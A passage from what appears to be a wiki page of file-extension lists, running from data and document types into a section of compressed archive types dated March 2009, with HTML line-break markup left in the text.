.3dr&lt;br /&gt;
.3dt&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.4dv&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.a3l&lt;br /&gt;
.a3m&lt;br /&gt;
.a3w&lt;br /&gt;
.a4l&lt;br /&gt;
.a4m&lt;br /&gt;
.a4w&lt;br /&gt;
.a5l&lt;br /&gt;
.a5w&lt;br /&gt;
.a65&lt;br /&gt;
.aao&lt;br /&gt;
.ab&lt;br /&gt;
.ab1&lt;br /&gt;
.ab2&lt;br /&gt;
.ab3&lt;br /&gt;
.abcd&lt;br /&gt;
.abi&lt;br /&gt;
.abp&lt;br /&gt;
.aby&lt;br /&gt;
.aca&lt;br /&gt;
.acc&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.ade&lt;br /&gt;
.adp&lt;br /&gt;
.adt&lt;br /&gt;
.adx&lt;br /&gt;
.aft&lt;br /&gt;
.agd&lt;br /&gt;
.aifb&lt;br /&gt;
.alc&lt;br /&gt;
.ald&lt;br /&gt;
.ali&lt;br /&gt;
.amb&lt;br /&gt;
.amsorm&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.apr&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ask&lt;br /&gt;
.asm&lt;br /&gt;
.ast&lt;br /&gt;
.at5&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.awg&lt;br /&gt;
.azw&lt;br /&gt;
.bafl&lt;br /&gt;
.bci&lt;br /&gt;
.bcm&lt;br /&gt;
.bdf&lt;br /&gt;
.bdic&lt;br /&gt;
.bfx&lt;br /&gt;
.bgl&lt;br /&gt;
.bgt&lt;br /&gt;
.bin&lt;br /&gt;
.bjo&lt;br /&gt;
.bk&lt;br /&gt;
.bkk&lt;br /&gt;
.blb&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.bok&lt;br /&gt;
.box&lt;br /&gt;
.brd&lt;br /&gt;
.brw&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btm&lt;br /&gt;
.btr&lt;br /&gt;
.cap&lt;br /&gt;
.cat&lt;br /&gt;
.cbg&lt;br /&gt;
.cch&lt;br /&gt;
.ccr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.cdx&lt;br /&gt;
.cel&lt;br /&gt;
.celtx&lt;br /&gt;
.chg&lt;br /&gt;
.chk&lt;br /&gt;
.chn&lt;br /&gt;
.ckd&lt;br /&gt;
.ckt&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.clp&lt;br /&gt;
.cmbl&lt;br /&gt;
.cna&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.crd&lt;br /&gt;
.crtx&lt;br /&gt;
.csa&lt;br /&gt;
.csv&lt;br /&gt;
.ctf&lt;br /&gt;
.ctt&lt;br /&gt;
.cursorfx&lt;br /&gt;
.curxptheme&lt;br /&gt;
.cvd&lt;br /&gt;
.cvn&lt;br /&gt;
.cwk&lt;br /&gt;
.cws&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.cyo&lt;br /&gt;
.cys&lt;br /&gt;
.daf&lt;br /&gt;
.dal&lt;br /&gt;
.dam&lt;br /&gt;
.das&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.db2&lt;br /&gt;
.db3&lt;br /&gt;
.dbc&lt;br /&gt;
.dbd&lt;br /&gt;
.dbf&lt;br /&gt;
.dbx&lt;br /&gt;
.dcf&lt;br /&gt;
.dcl&lt;br /&gt;
.dcm&lt;br /&gt;
.dcmd&lt;br /&gt;
.ddc&lt;br /&gt;
.ddcx&lt;br /&gt;
.ddt&lt;br /&gt;
.dem&lt;br /&gt;
.des&lt;br /&gt;
.dex&lt;br /&gt;
.dfm&lt;br /&gt;
.dfproj&lt;br /&gt;
.dft&lt;br /&gt;
.dgb&lt;br /&gt;
.dif&lt;br /&gt;
.dii&lt;br /&gt;
.dlg&lt;br /&gt;
.dm2&lt;br /&gt;
.dmo&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dockzip&lt;br /&gt;
.dp1&lt;br /&gt;
.dpn&lt;br /&gt;
.dpx&lt;br /&gt;
.drl&lt;br /&gt;
.dsb&lt;br /&gt;
.dsd&lt;br /&gt;
.dsk&lt;br /&gt;
.dsy&lt;br /&gt;
.dsz&lt;br /&gt;
.dt0&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.dtr&lt;br /&gt;
.dvdproj&lt;br /&gt;
.dvo&lt;br /&gt;
.dwi&lt;br /&gt;
.e00&lt;br /&gt;
.eap&lt;br /&gt;
.ebuild&lt;br /&gt;
.ec0&lt;br /&gt;
.eco&lt;br /&gt;
.ecx&lt;br /&gt;
.edb&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.egp&lt;br /&gt;
.emb&lt;br /&gt;
.emd&lt;br /&gt;
.emlxpart&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epp&lt;br /&gt;
.epub&lt;br /&gt;
.epw&lt;br /&gt;
.er1&lt;br /&gt;
.esp&lt;br /&gt;
.ess&lt;br /&gt;
.est&lt;br /&gt;
.esx&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.etd&lt;br /&gt;
.etl&lt;br /&gt;
.ev&lt;br /&gt;
.ev3&lt;br /&gt;
.evt&lt;br /&gt;
.evy&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.exx&lt;br /&gt;
.fa&lt;br /&gt;
.fasta&lt;br /&gt;
.fbl&lt;br /&gt;
.fcd&lt;br /&gt;
.fcs&lt;br /&gt;
.fdb&lt;br /&gt;
.ffd&lt;br /&gt;
.ffwp&lt;br /&gt;
.fhc&lt;br /&gt;
.fid&lt;br /&gt;
.fil&lt;br /&gt;
.flame&lt;br /&gt;
.fll&lt;br /&gt;
.flo&lt;br /&gt;
.flp&lt;br /&gt;
.flt&lt;br /&gt;
.fm&lt;br /&gt;
.fm5&lt;br /&gt;
.fmp&lt;br /&gt;
.fo&lt;br /&gt;
.fob&lt;br /&gt;
.fol&lt;br /&gt;
.fop&lt;br /&gt;
.fox&lt;br /&gt;
.fp&lt;br /&gt;
.fp3&lt;br /&gt;
.fp4&lt;br /&gt;
.fp5&lt;br /&gt;
.fp7&lt;br /&gt;
.frl&lt;br /&gt;
.frm&lt;br /&gt;
.fro&lt;br /&gt;
.frx&lt;br /&gt;
.fsb&lt;br /&gt;
.fsc&lt;br /&gt;
.ftm&lt;br /&gt;
.ftw&lt;br /&gt;
.gan&lt;br /&gt;
.gbr&lt;br /&gt;
.gc&lt;br /&gt;
.gcx&lt;br /&gt;
.gdb&lt;br /&gt;
.ged&lt;br /&gt;
.gedcom&lt;br /&gt;
.gen&lt;br /&gt;
.ggb&lt;br /&gt;
.gml&lt;br /&gt;
.gms&lt;br /&gt;
.gno&lt;br /&gt;
.gnp&lt;br /&gt;
.gp3&lt;br /&gt;
.gpi&lt;br /&gt;
.gps&lt;br /&gt;
.gpx&lt;br /&gt;
.gra&lt;br /&gt;
.grade&lt;br /&gt;
.grf&lt;br /&gt;
.grib&lt;br /&gt;
.grk&lt;br /&gt;
.grr&lt;br /&gt;
.grv&lt;br /&gt;
.gs&lt;br /&gt;
.gst&lt;br /&gt;
.gtp&lt;br /&gt;
.gwk&lt;br /&gt;
.gxl&lt;br /&gt;
.hcc&lt;br /&gt;
.hce&lt;br /&gt;
.hci&lt;br /&gt;
.hcp&lt;br /&gt;
.hcr&lt;br /&gt;
.hcu&lt;br /&gt;
.hda&lt;br /&gt;
.hdb&lt;br /&gt;
.hdf&lt;br /&gt;
.hdi&lt;br /&gt;
.hdl&lt;br /&gt;
.hif&lt;br /&gt;
.hl&lt;br /&gt;
.hml&lt;br /&gt;
.hmt&lt;br /&gt;
.hs2&lt;br /&gt;
.hsk&lt;br /&gt;
.hst&lt;br /&gt;
.htg&lt;br /&gt;
.huh&lt;br /&gt;
.hyv&lt;br /&gt;
.i5z&lt;br /&gt;
.ib&lt;br /&gt;
.ics&lt;br /&gt;
.id2&lt;br /&gt;
.idx&lt;br /&gt;
.igc&lt;br /&gt;
.ihx&lt;br /&gt;
.ii&lt;br /&gt;
.iif&lt;br /&gt;
.img&lt;br /&gt;
.imt&lt;br /&gt;
.ink&lt;br /&gt;
.inp&lt;br /&gt;
.ins&lt;br /&gt;
.ip&lt;br /&gt;
.irock&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.isf&lt;br /&gt;
.itdb&lt;br /&gt;
.itl&lt;br /&gt;
.itm&lt;br /&gt;
.itn&lt;br /&gt;
.itw&lt;br /&gt;
.itx&lt;br /&gt;
.ivt&lt;br /&gt;
.iw&lt;br /&gt;
.ixb&lt;br /&gt;
.jasper&lt;br /&gt;
.jdb&lt;br /&gt;
.jef&lt;br /&gt;
.jmp&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.joboptions&lt;br /&gt;
.joined&lt;br /&gt;
.jph&lt;br /&gt;
.jrprint&lt;br /&gt;
.jrxml&lt;br /&gt;
.jude&lt;br /&gt;
.kap&lt;br /&gt;
.kdb&lt;br /&gt;
.kid&lt;br /&gt;
.kismac&lt;br /&gt;
.kmz&lt;br /&gt;
.kpf&lt;br /&gt;
.kpp&lt;br /&gt;
.kpr&lt;br /&gt;
.kpx&lt;br /&gt;
.kpz&lt;br /&gt;
.l&lt;br /&gt;
.l6t&lt;br /&gt;
.laccdb&lt;br /&gt;
.lbl&lt;br /&gt;
.lbx&lt;br /&gt;
.lcd&lt;br /&gt;
.lcf&lt;br /&gt;
.lcm&lt;br /&gt;
.ldif&lt;br /&gt;
.lex&lt;br /&gt;
.lgc&lt;br /&gt;
.lgf&lt;br /&gt;
.lgh&lt;br /&gt;
.lgi&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.lif&lt;br /&gt;
.livereg&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lix&lt;br /&gt;
.llb&lt;br /&gt;
.lms&lt;br /&gt;
.lmx&lt;br /&gt;
.lnt&lt;br /&gt;
.loc&lt;br /&gt;
.lp7&lt;br /&gt;
.lrf&lt;br /&gt;
.lrs&lt;br /&gt;
.lrx&lt;br /&gt;
.lsf&lt;br /&gt;
.lsl&lt;br /&gt;
.lsp&lt;br /&gt;
.lsr&lt;br /&gt;
.lst&lt;br /&gt;
.lsu&lt;br /&gt;
.lvm&lt;br /&gt;
.lw4&lt;br /&gt;
.ly&lt;br /&gt;
.m&lt;br /&gt;
.mag&lt;br /&gt;
.mai&lt;br /&gt;
.map&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mbf&lt;br /&gt;
.mbg&lt;br /&gt;
.mbl&lt;br /&gt;
.mbp&lt;br /&gt;
.mbx&lt;br /&gt;
.mc1&lt;br /&gt;
.mc9&lt;br /&gt;
.mcd&lt;br /&gt;
.md&lt;br /&gt;
.mdb&lt;br /&gt;
.mdc&lt;br /&gt;
.mdf&lt;br /&gt;
.mdl&lt;br /&gt;
.mdm&lt;br /&gt;
.mdn&lt;br /&gt;
.mdt&lt;br /&gt;
.mdx&lt;br /&gt;
.mdz&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mex&lt;br /&gt;
.mfo&lt;br /&gt;
.mfp&lt;br /&gt;
.mgc&lt;br /&gt;
.mls&lt;br /&gt;
.mm&lt;br /&gt;
.mmap&lt;br /&gt;
.mmc&lt;br /&gt;
.mmf&lt;br /&gt;
.mmp&lt;br /&gt;
.mnc&lt;br /&gt;
.mng&lt;br /&gt;
.mnk&lt;br /&gt;
.mno&lt;br /&gt;
.mny&lt;br /&gt;
.mobi&lt;br /&gt;
.moho&lt;br /&gt;
.mosaic&lt;br /&gt;
.mox&lt;br /&gt;
.mpd&lt;br /&gt;
.mpj&lt;br /&gt;
.mpp&lt;br /&gt;
.mpt&lt;br /&gt;
.mpx&lt;br /&gt;
.mpz&lt;br /&gt;
.mq4&lt;br /&gt;
.ms10&lt;br /&gt;
.mth&lt;br /&gt;
.mtw&lt;br /&gt;
.mud&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mws&lt;br /&gt;
.mwx&lt;br /&gt;
.mxd&lt;br /&gt;
.myd&lt;br /&gt;
.myi&lt;br /&gt;
.nb&lt;br /&gt;
.nc&lt;br /&gt;
.ndf&lt;br /&gt;
.ndk&lt;br /&gt;
.ndx&lt;br /&gt;
.net&lt;br /&gt;
.neta&lt;br /&gt;
.nfo&lt;br /&gt;
.nitf&lt;br /&gt;
.nmind&lt;br /&gt;
.not&lt;br /&gt;
.notebook&lt;br /&gt;
.np&lt;br /&gt;
.npl&lt;br /&gt;
.npt&lt;br /&gt;
.nrl&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.nsf&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.nvl&lt;br /&gt;
.nyf&lt;br /&gt;
.oab&lt;br /&gt;
.obj&lt;br /&gt;
.odb&lt;br /&gt;
.odf&lt;br /&gt;
.odp&lt;br /&gt;
.ods&lt;br /&gt;
.odx&lt;br /&gt;
.oeaccount&lt;br /&gt;
.ofc&lt;br /&gt;
.ofm&lt;br /&gt;
.oft&lt;br /&gt;
.ofx&lt;br /&gt;
.omcs&lt;br /&gt;
.omp&lt;br /&gt;
.ond&lt;br /&gt;
.one&lt;br /&gt;
.oo3&lt;br /&gt;
.opf&lt;br /&gt;
.opx&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.or6&lt;br /&gt;
.org&lt;br /&gt;
.orx&lt;br /&gt;
.otf&lt;br /&gt;
.otl&lt;br /&gt;
.otln&lt;br /&gt;
.ots&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ova&lt;br /&gt;
.ovf&lt;br /&gt;
.p96&lt;br /&gt;
.p97&lt;br /&gt;
.pab&lt;br /&gt;
.paf&lt;br /&gt;
.pan&lt;br /&gt;
.pbd&lt;br /&gt;
.pc&lt;br /&gt;
.pcap&lt;br /&gt;
.pcb&lt;br /&gt;
.pcr&lt;br /&gt;
.pd4&lt;br /&gt;
.pd5&lt;br /&gt;
.pdas&lt;br /&gt;
.pdb&lt;br /&gt;
.pdd&lt;br /&gt;
.pdm&lt;br /&gt;
.pds&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pep&lt;br /&gt;
.pex&lt;br /&gt;
.pfc&lt;br /&gt;
.pfl&lt;br /&gt;
.phb&lt;br /&gt;
.phm&lt;br /&gt;
.pi&lt;br /&gt;
.pis&lt;br /&gt;
.pjx&lt;br /&gt;
.pka&lt;br /&gt;
.pkb&lt;br /&gt;
.pkh&lt;br /&gt;
.pks&lt;br /&gt;
.pkt&lt;br /&gt;
.pln&lt;br /&gt;
.plw&lt;br /&gt;
.pmo&lt;br /&gt;
.pmr&lt;br /&gt;
.pnproj&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pod&lt;br /&gt;
.poi&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pot&lt;br /&gt;
.potm&lt;br /&gt;
.potx&lt;br /&gt;
.pp2&lt;br /&gt;
.ppf&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.prc&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.prj&lt;br /&gt;
.prm&lt;br /&gt;
.prs&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.psm&lt;br /&gt;
.pst&lt;br /&gt;
.ptb&lt;br /&gt;
.ptf&lt;br /&gt;
.ptk&lt;br /&gt;
.ptm&lt;br /&gt;
.ptn&lt;br /&gt;
.ptt&lt;br /&gt;
.ptz&lt;br /&gt;
.pvl&lt;br /&gt;
.pwd&lt;br /&gt;
.pxj&lt;br /&gt;
.pxl&lt;br /&gt;
.q07&lt;br /&gt;
.q08&lt;br /&gt;
.q09&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qdfm&lt;br /&gt;
.qel&lt;br /&gt;
.qfx&lt;br /&gt;
.qif&lt;br /&gt;
.qpb&lt;br /&gt;
.qpf&lt;br /&gt;
.qph&lt;br /&gt;
.qpm&lt;br /&gt;
.qpw&lt;br /&gt;
.qrp&lt;br /&gt;
.qsd&lt;br /&gt;
.ral&lt;br /&gt;
.rbt&lt;br /&gt;
.rcd&lt;br /&gt;
.rcg&lt;br /&gt;
.rdb&lt;br /&gt;
.rdf&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.ret&lt;br /&gt;
.rf1&lt;br /&gt;
.rfa&lt;br /&gt;
.rfo&lt;br /&gt;
.rge&lt;br /&gt;
.rgn&lt;br /&gt;
.rgo&lt;br /&gt;
.rmuf&lt;br /&gt;
.rnq&lt;br /&gt;
.rod&lt;br /&gt;
.rog&lt;br /&gt;
.roi&lt;br /&gt;
.rou&lt;br /&gt;
.rpp&lt;br /&gt;
.rpt&lt;br /&gt;
.rrt&lt;br /&gt;
.rsc&lt;br /&gt;
.rsd&lt;br /&gt;
.rsw&lt;br /&gt;
.rte&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.rzb&lt;br /&gt;
.s85&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sar&lt;br /&gt;
.sav&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sca&lt;br /&gt;
.scf&lt;br /&gt;
.sch&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sdp&lt;br /&gt;
.sdq&lt;br /&gt;
.sds&lt;br /&gt;
.sen&lt;br /&gt;
.seo&lt;br /&gt;
.seq&lt;br /&gt;
.ser&lt;br /&gt;
.sgml&lt;br /&gt;
.sgn&lt;br /&gt;
.shp&lt;br /&gt;
.shs&lt;br /&gt;
.shx&lt;br /&gt;
.skc&lt;br /&gt;
.skv&lt;br /&gt;
.skx&lt;br /&gt;
.sle&lt;br /&gt;
.slk&lt;br /&gt;
.slp&lt;br /&gt;
.snapfireshow&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sps&lt;br /&gt;
.spub&lt;br /&gt;
.spv&lt;br /&gt;
.sq&lt;br /&gt;
.sqd&lt;br /&gt;
.sql&lt;br /&gt;
.sqlite&lt;br /&gt;
.sqr&lt;br /&gt;
.sta&lt;br /&gt;
.stc&lt;br /&gt;
.stf&lt;br /&gt;
.stk&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.stp&lt;br /&gt;
.str&lt;br /&gt;
.stt&lt;br /&gt;
.stw&lt;br /&gt;
.styk&lt;br /&gt;
.stykz&lt;br /&gt;
.swk&lt;br /&gt;
.sxc&lt;br /&gt;
.sxi&lt;br /&gt;
.sy3&lt;br /&gt;
.t01&lt;br /&gt;
.t02&lt;br /&gt;
.t03&lt;br /&gt;
.t04&lt;br /&gt;
.t05&lt;br /&gt;
.t06&lt;br /&gt;
.t07&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.t3001&lt;br /&gt;
.tax2008&lt;br /&gt;
.tax2009&lt;br /&gt;
.tb&lt;br /&gt;
.tbk&lt;br /&gt;
.tbl&lt;br /&gt;
.tcc&lt;br /&gt;
.tcx&lt;br /&gt;
.tda&lt;br /&gt;
.tdl&lt;br /&gt;
.tdm&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.te3&lt;br /&gt;
.teacher&lt;br /&gt;
.tef&lt;br /&gt;
.tet&lt;br /&gt;
.tfa&lt;br /&gt;
.tfd&lt;br /&gt;
.tfrd&lt;br /&gt;
.tjp&lt;br /&gt;
.tk3&lt;br /&gt;
.tkfl&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.topc&lt;br /&gt;
.tpb&lt;br /&gt;
.tps&lt;br /&gt;
.tr3&lt;br /&gt;
.tra&lt;br /&gt;
.trd&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tst&lt;br /&gt;
.tsv&lt;br /&gt;
.ttk&lt;br /&gt;
.txa&lt;br /&gt;
.txd&lt;br /&gt;
.txf&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udb&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.ulf&lt;br /&gt;
.ulz&lt;br /&gt;
.update&lt;br /&gt;
.upoi&lt;br /&gt;
.usr&lt;br /&gt;
.uvf&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vbpf1&lt;br /&gt;
.vcd&lt;br /&gt;
.vce&lt;br /&gt;
.vcf&lt;br /&gt;
.vcs&lt;br /&gt;
.vdb&lt;br /&gt;
.vdx&lt;br /&gt;
.vfs&lt;br /&gt;
.vi&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vmt&lt;br /&gt;
.voi&lt;br /&gt;
.vok&lt;br /&gt;
.vrd&lt;br /&gt;
.vscontent&lt;br /&gt;
.vsx&lt;br /&gt;
.vtx&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb2&lt;br /&gt;
.wb3&lt;br /&gt;
.wdb&lt;br /&gt;
.wdq&lt;br /&gt;
.wea&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.wgp&lt;br /&gt;
.wgt&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wjr&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wki&lt;br /&gt;
.wks&lt;br /&gt;
.wku&lt;br /&gt;
.wlmp&lt;br /&gt;
.wmdb&lt;br /&gt;
.wor&lt;br /&gt;
.wpc&lt;br /&gt;
.wpf&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtb&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xdp&lt;br /&gt;
.xds&lt;br /&gt;
.xef&lt;br /&gt;
.xem&lt;br /&gt;
.xfd&lt;br /&gt;
.xfo&lt;br /&gt;
.xft&lt;br /&gt;
.xl&lt;br /&gt;
.xlc&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsb&lt;br /&gt;
.xlsm&lt;br /&gt;
.xlsx&lt;br /&gt;
.xlt&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xlw&lt;br /&gt;
.xmcd&lt;br /&gt;
.xml&lt;br /&gt;
.xmlper&lt;br /&gt;
.xmpz&lt;br /&gt;
.xpg&lt;br /&gt;
.xpj&lt;br /&gt;
.xpm&lt;br /&gt;
.xpt&lt;br /&gt;
.xrp&lt;br /&gt;
.xsl&lt;br /&gt;
.xslt&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.yam&lt;br /&gt;
.zap&lt;br /&gt;
.zdb&lt;br /&gt;
.zdc&lt;br /&gt;
.zix&lt;br /&gt;
.zmc&lt;br /&gt;
.zpl&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== (Compressed File Types - (Update: 16 March 2009 - Total Statements: 187) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;.0&lt;br /&gt;
.000&lt;br /&gt;
.7z&lt;br /&gt;
.a00&lt;br /&gt;
.a01&lt;br /&gt;
.a02&lt;br /&gt;
.ace&lt;br /&gt;
.ain&lt;br /&gt;
.alz&lt;br /&gt;
.apz&lt;br /&gt;
.ar&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ari&lt;br /&gt;
.arj&lt;br /&gt;
.ark&lt;br /&gt;
.axx&lt;br /&gt;
.b64&lt;br /&gt;
.ba&lt;br /&gt;
.bh&lt;br /&gt;
.boo&lt;br /&gt;
.bz&lt;br /&gt;
.bz2&lt;br /&gt;
.bzip&lt;br /&gt;
.bzip2&lt;br /&gt;
.c00&lt;br /&gt;
.c01&lt;br /&gt;
.c02&lt;br /&gt;
.car&lt;br /&gt;
.cb7&lt;br /&gt;
.cbr&lt;br /&gt;
.cbt&lt;br /&gt;
.cbz&lt;br /&gt;
.cp9&lt;br /&gt;
.cpgz&lt;br /&gt;
.cpt&lt;br /&gt;
.dar&lt;br /&gt;
.dd&lt;br /&gt;
.deb&lt;br /&gt;
.dgc&lt;br /&gt;
.dist&lt;br /&gt;
.ecs&lt;br /&gt;
.efw&lt;br /&gt;
.epi&lt;br /&gt;
.f&lt;br /&gt;
.fdp&lt;br /&gt;
.gca&lt;br /&gt;
.gz&lt;br /&gt;
.gzi&lt;br /&gt;
.gzip&lt;br /&gt;
.ha&lt;br /&gt;
.hbc&lt;br /&gt;
.hbc2&lt;br /&gt;
.hbe&lt;br /&gt;
.hki&lt;br /&gt;
.hki1&lt;br /&gt;
.hki2&lt;br /&gt;
.hki3&lt;br /&gt;
.hpk&lt;br /&gt;
.hyp&lt;br /&gt;
.ice&lt;br /&gt;
.ipg&lt;br /&gt;
.ipk&lt;br /&gt;
.ish&lt;br /&gt;
.j&lt;br /&gt;
.jar.pack&lt;br /&gt;
.jgz&lt;br /&gt;
.jic&lt;br /&gt;
.kgb&lt;br /&gt;
.lbr&lt;br /&gt;
.lemon&lt;br /&gt;
.lha&lt;br /&gt;
.lnx&lt;br /&gt;
.lqr&lt;br /&gt;
.lz&lt;br /&gt;
.lzh&lt;br /&gt;
.lzm&lt;br /&gt;
.lzma&lt;br /&gt;
.lzo&lt;br /&gt;
.lzx&lt;br /&gt;
.md&lt;br /&gt;
.mint&lt;br /&gt;
.mou&lt;br /&gt;
.mpkg&lt;br /&gt;
.mzp&lt;br /&gt;
.oar&lt;br /&gt;
.p7m&lt;br /&gt;
.pack.gz&lt;br /&gt;
.package&lt;br /&gt;
.pae&lt;br /&gt;
.pak&lt;br /&gt;
.paq6&lt;br /&gt;
.paq7&lt;br /&gt;
.paq8&lt;br /&gt;
.par&lt;br /&gt;
.par2&lt;br /&gt;
.pbi&lt;br /&gt;
.pcv&lt;br /&gt;
.pea&lt;br /&gt;
.pet&lt;br /&gt;
.pf&lt;br /&gt;
.pim&lt;br /&gt;
.pit&lt;br /&gt;
.piz&lt;br /&gt;
.pkg&lt;br /&gt;
.pup&lt;br /&gt;
.puz&lt;br /&gt;
.pwa&lt;br /&gt;
.qda&lt;br /&gt;
.r0&lt;br /&gt;
.r00&lt;br /&gt;
.r01&lt;br /&gt;
.r02&lt;br /&gt;
.r03&lt;br /&gt;
.r1&lt;br /&gt;
.r2&lt;br /&gt;
.r30&lt;br /&gt;
.rar&lt;br /&gt;
.rev&lt;br /&gt;
.rk&lt;br /&gt;
.rnc&lt;br /&gt;
.rp9&lt;br /&gt;
.rpm&lt;br /&gt;
.rte&lt;br /&gt;
.rz&lt;br /&gt;
.rzs&lt;br /&gt;
.s00&lt;br /&gt;
.s01&lt;br /&gt;
.s02&lt;br /&gt;
.s7z&lt;br /&gt;
.sar&lt;br /&gt;
.sdc&lt;br /&gt;
.sdn&lt;br /&gt;
.sea&lt;br /&gt;
.sen&lt;br /&gt;
.sfs&lt;br /&gt;
.sfx&lt;br /&gt;
.sh&lt;br /&gt;
.shar&lt;br /&gt;
.shk&lt;br /&gt;
.shr&lt;br /&gt;
.sit&lt;br /&gt;
.sitx&lt;br /&gt;
.spt&lt;br /&gt;
.sqx&lt;br /&gt;
.sqz&lt;br /&gt;
.tar&lt;br /&gt;
.tar.gz&lt;br /&gt;
.tar.xz&lt;br /&gt;
.taz&lt;br /&gt;
.tbz&lt;br /&gt;
.tbz2&lt;br /&gt;
.tg&lt;br /&gt;
.tgz&lt;br /&gt;
.tlz&lt;br /&gt;
.tlzma&lt;br /&gt;
.txz&lt;br /&gt;
.tz&lt;br /&gt;
.uc2&lt;br /&gt;
.uha&lt;br /&gt;
.vem&lt;br /&gt;
.vsi&lt;br /&gt;
.wad&lt;br /&gt;
.war&lt;br /&gt;
